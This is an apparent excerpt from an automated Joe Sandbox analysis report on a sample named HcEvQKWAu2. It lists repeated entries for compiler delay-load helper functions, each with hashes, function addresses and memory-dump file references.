                                          Similarity
                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                          • String ID:
                                          • API String ID: 1269201914-0
                                          • Opcode ID: db983930fd7e1dd018977d00a7cd71c74dbdb8a0c7652d9a9f5cb1a2d108306a
                                          • Instruction ID: 8a5554c9b98c3fb4e6e9e4321f500d9384daf4543c41bea83d139a5f65a395b6
                                          • Opcode Fuzzy Hash: db983930fd7e1dd018977d00a7cd71c74dbdb8a0c7652d9a9f5cb1a2d108306a
                                          • Instruction Fuzzy Hash: 54B012F2268041AC3504D1471D0AE37010CC2C0F10330407EF805C5081DC44ADC43872
                                          Function 00F9E232 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                          Download Yara Rule
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F9E1E3
                                            • Part of subcall function 00F9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9E8D0
                                            • Part of subcall function 00F9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9E8E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                          • String ID:
                                          • API String ID: 1269201914-0
                                          • Opcode ID: abfed1c844e0416c077a3a26e1e16c1c31f8faa383b2c45b037e5c8987693b5d
                                          • Instruction ID: e8fc537b7374c29066a2fb14bf5d8cbde55ae06bcd6b175456bffb4e7d271a3b
                                          • Opcode Fuzzy Hash: abfed1c844e0416c077a3a26e1e16c1c31f8faa383b2c45b037e5c8987693b5d
                                          • Instruction Fuzzy Hash: AFB012F2268041AC3504D1471E0AE37010DC2C0F10330403EF805C5081DC45AEC53872
                                          Function 00F9E228 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                          Download Yara Rule
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F9E1E3
                                            • Part of subcall function 00F9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9E8D0
                                            • Part of subcall function 00F9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9E8E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                          • String ID:
                                          • API String ID: 1269201914-0
                                          • Opcode ID: 2b4870a12b52bfa8cf81d4c73da3b863ad74f6db24cde624e88ac5695f5887ab
                                          • Instruction ID: e103ab30103f1dc2e228f13b9888eb5ff158682a6a5149c1de87bf99857148c8
                                          • Opcode Fuzzy Hash: 2b4870a12b52bfa8cf81d4c73da3b863ad74f6db24cde624e88ac5695f5887ab
                                          • Instruction Fuzzy Hash: A4B012F2268141BC3544D1471D0AE37010CC2C0F10330413EF805C5081DC45ADC43872
                                          Function 00F9E21E Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                          Download Yara Rule
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F9E1E3
                                            • Part of subcall function 00F9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9E8D0
                                            • Part of subcall function 00F9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9E8E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                          • String ID:
                                          • API String ID: 1269201914-0
                                          • Opcode ID: 5dcc3c0e2555448f7d5abf267326cd34a83da10c4374cb4126205b7d182d7004
                                          • Instruction ID: 1164001d02964e776b3a354ed87da2da189f7c17c51aa39f90eb7ff1f2234590
                                          • Opcode Fuzzy Hash: 5dcc3c0e2555448f7d5abf267326cd34a83da10c4374cb4126205b7d182d7004
                                          • Instruction Fuzzy Hash: A9B012F2268041BC3504D1471D0AE37010CC2C1F10330803EFC05C5081DC44EDC43872
                                          Function 00F9E20A Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                          Download Yara Rule
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F9E1E3
                                            • Part of subcall function 00F9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9E8D0
                                            • Part of subcall function 00F9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9E8E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                          • String ID:
                                          • API String ID: 1269201914-0
                                          • Opcode ID: 43d210c44ecc3c97696f59de5ea29bf3e07412bb21d072e4d08322692ef0de1f
                                          • Instruction ID: dbb83f2a3c2a591f2e32960190f6b8eda41b68dfb1d9593fa54ace943b760655
                                          • Opcode Fuzzy Hash: 43d210c44ecc3c97696f59de5ea29bf3e07412bb21d072e4d08322692ef0de1f
                                          • Instruction Fuzzy Hash: 8FB012D2268041BC3504D2471E0AE37010CC2C0B10330803EF805C5181DC55ADCD3872
                                          Function 00F9E200 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                          Download Yara Rule
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F9E1E3
                                            • Part of subcall function 00F9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9E8D0
                                            • Part of subcall function 00F9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9E8E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                          • String ID:
                                          • API String ID: 1269201914-0
                                          • Opcode ID: 9f181434d330fc0015b0ba8d5c05e77026f7973890aaaad5cdf6944d5deb14bb
                                          • Instruction ID: 051be65a1aa9495bfdd8f5aced4760f948d217359dc439526362a8d02ce642a3
                                          • Opcode Fuzzy Hash: 9f181434d330fc0015b0ba8d5c05e77026f7973890aaaad5cdf6944d5deb14bb
                                          • Instruction Fuzzy Hash: 6AB012D2368181BC3544D2472D0AE37010CC2C0B10330813EF805C5181DC44ACC83872
                                          Function 00F9E44B Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                          Download Yara Rule
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F9E3FC
                                            • Part of subcall function 00F9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9E8D0
                                            • Part of subcall function 00F9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9E8E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                          • String ID:
                                          • API String ID: 1269201914-0
                                          • Opcode ID: 595f7133b122e156a99756567ab6b522a816fa6263689b04b02a0d8ba83e2f6e
                                          • Instruction ID: 2c50648f43b11adcf9c708e4e783c01e3aea55f39d382e20cae084df5e8aa6e5
                                          • Opcode Fuzzy Hash: 595f7133b122e156a99756567ab6b522a816fa6263689b04b02a0d8ba83e2f6e
                                          • Instruction Fuzzy Hash: B3B012E2268040BC3544D1475C0AE77030DC0C0B10330C42FF908C20C1EC408C043873
                                          Function 00F9E423 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                          Download Yara Rule
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F9E3FC
                                            • Part of subcall function 00F9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9E8D0
                                            • Part of subcall function 00F9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9E8E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                          • String ID:
                                          • API String ID: 1269201914-0
                                          • Opcode ID: 5c4cfff8d0b90c4897e6fa30dedbc481e8b76b22e62d520933e7236dad4e06a1
                                          • Instruction ID: a146cf11819f5ddc25dda3e1344c7b20237d6b3df10938d4521f151449db6680
                                          • Opcode Fuzzy Hash: 5c4cfff8d0b90c4897e6fa30dedbc481e8b76b22e62d520933e7236dad4e06a1
                                          • Instruction Fuzzy Hash: BDB012F2268040BC3544D1475C0AE77030DC0C0F10331842FF808C2081EC448E003873
                                          Function 00F9E419 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                          Download Yara Rule
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F9E3FC
                                            • Part of subcall function 00F9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9E8D0
                                            • Part of subcall function 00F9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9E8E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                          • String ID:
                                          • API String ID: 1269201914-0
                                          • Opcode ID: 15d8f0a51ddd88a18053bf7a7bfd3baab98c9e3d203b988c985ba3294646d062
                                          • Instruction ID: f2416d86446d762cd42add90c7216a4aad171de86eb3f9b2d597edb8510877c0
                                          • Opcode Fuzzy Hash: 15d8f0a51ddd88a18053bf7a7bfd3baab98c9e3d203b988c985ba3294646d062
                                          • Instruction Fuzzy Hash: 40B012E22680407C3504D1475D0AEB7030DC0C0B20330C42FF608C2081EC414C093873
                                          Function 00F9E5B1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                          Download Yara Rule
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F9E580
                                            • Part of subcall function 00F9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9E8D0
                                            • Part of subcall function 00F9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9E8E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                          • String ID:
                                          • API String ID: 1269201914-0
                                          • Opcode ID: f30b13e028441b3b630459553d6245d8f01f84289e3b77d83401700f6485fa38
                                          • Instruction ID: 17fbacfd0867d4b9f56e84caa714ed83b2240b65e93e1d6716f6dea04240d9ee
                                          • Opcode Fuzzy Hash: f30b13e028441b3b630459553d6245d8f01f84289e3b77d83401700f6485fa38
                                          • Instruction Fuzzy Hash: 74B012C26691407C3544D1965C0BE37021DC1C1B10335422FF408C20C2FC455C503872
                                          Function 00F9E5A7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                          Download Yara Rule
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F9E580
                                            • Part of subcall function 00F9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9E8D0
                                            • Part of subcall function 00F9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9E8E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                          • String ID:
                                          • API String ID: 1269201914-0
                                          • Opcode ID: 96b4a5898636704c22b3a133a28c1360e98531b68dc85b07f0ae5fba5d9c4c86
                                          • Instruction ID: 4663f075aeb4b936dd7638c563d73a9327ab8142296cdd0464a636b5d89e8b2d
                                          • Opcode Fuzzy Hash: 96b4a5898636704c22b3a133a28c1360e98531b68dc85b07f0ae5fba5d9c4c86
                                          • Instruction Fuzzy Hash: 61B012C26690407C3504D1965D0AE37021DC1C1B10335422FF408C20C2FC465D113872
                                          Function 00F9E593 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                          Download Yara Rule
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F9E580
                                            • Part of subcall function 00F9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9E8D0
                                            • Part of subcall function 00F9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9E8E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                          • String ID:
                                          • API String ID: 1269201914-0
                                          • Opcode ID: 267f688bdb5d2fba90c03ae7a327b89bb3a04bd8ec506a17ba67fcab3d5fae13
                                          • Instruction ID: c04677f3e41dab102bd649f8d1529b4a090e46d3cdfc209fbc7bcf6ff112b5c1
                                          • Opcode Fuzzy Hash: 267f688bdb5d2fba90c03ae7a327b89bb3a04bd8ec506a17ba67fcab3d5fae13
                                          • Instruction Fuzzy Hash: 72B012C36680407D3504D1961C0AE37020DC1C0B10331406FF408C20C1FC454C103872
                                          Function 00F9E546 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                          Download Yara Rule
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F9E51F
                                            • Part of subcall function 00F9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9E8D0
                                            • Part of subcall function 00F9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9E8E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                          • String ID:
                                          • API String ID: 1269201914-0
                                          • Opcode ID: 502ef480697fa67f6c1f2eaf0093874faa117ae2a1672f753dd02096e7b8af5d
                                          • Instruction ID: 2b2c2787e9145b552082375b53aba7d04999371568348db749165fc5c4dff4c8
                                          • Opcode Fuzzy Hash: 502ef480697fa67f6c1f2eaf0093874faa117ae2a1672f753dd02096e7b8af5d
                                          • Instruction Fuzzy Hash: C8B012C22691407C3604E14A5C0BE7B020DC0C1F14330423EF448C1081FC409C443C72
                                          Function 00F9E532 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                          Download Yara Rule
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F9E51F
                                            • Part of subcall function 00F9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9E8D0
                                            • Part of subcall function 00F9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9E8E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                          • String ID:
                                          • API String ID: 1269201914-0
                                          • Opcode ID: 182b3aefd2fb1daea9607437ae0de1f81ef15d6aece1ed0d57b4a8ba283fdc9d
                                          • Instruction ID: f0cf95f1d2bf19eb28cd4c3d83365d113f74d567e9aab3223bc3e031d405e852
                                          • Opcode Fuzzy Hash: 182b3aefd2fb1daea9607437ae0de1f81ef15d6aece1ed0d57b4a8ba283fdc9d
                                          • Instruction Fuzzy Hash: D6B012C32680407D3504D14A1C0AF7B020DC0C1F14330407EF448C1081FC408D003C72
                                          Function 00F9E528 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                          Download Yara Rule
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F9E51F
                                            • Part of subcall function 00F9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9E8D0
                                            • Part of subcall function 00F9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9E8E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                          • String ID:
                                          • API String ID: 1269201914-0
                                          • Opcode ID: c77d70e12e22ca90f411958f50a744b61e814cbd667e7df040300e7ddb59ad6a
                                          • Instruction ID: 50701de48e616a155b049cb5965c353ef7a0105511073147da4c28bbd5938bc6
                                          • Opcode Fuzzy Hash: c77d70e12e22ca90f411958f50a744b61e814cbd667e7df040300e7ddb59ad6a
                                          • Instruction Fuzzy Hash: F7B012C22680807C3504D14A1D0AE7B060DC0C1F24330803EF548C1081FC418C013C72
                                          Function 00F9E50D Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                          Download Yara Rule
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F9E51F
                                            • Part of subcall function 00F9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9E8D0
                                            • Part of subcall function 00F9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9E8E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
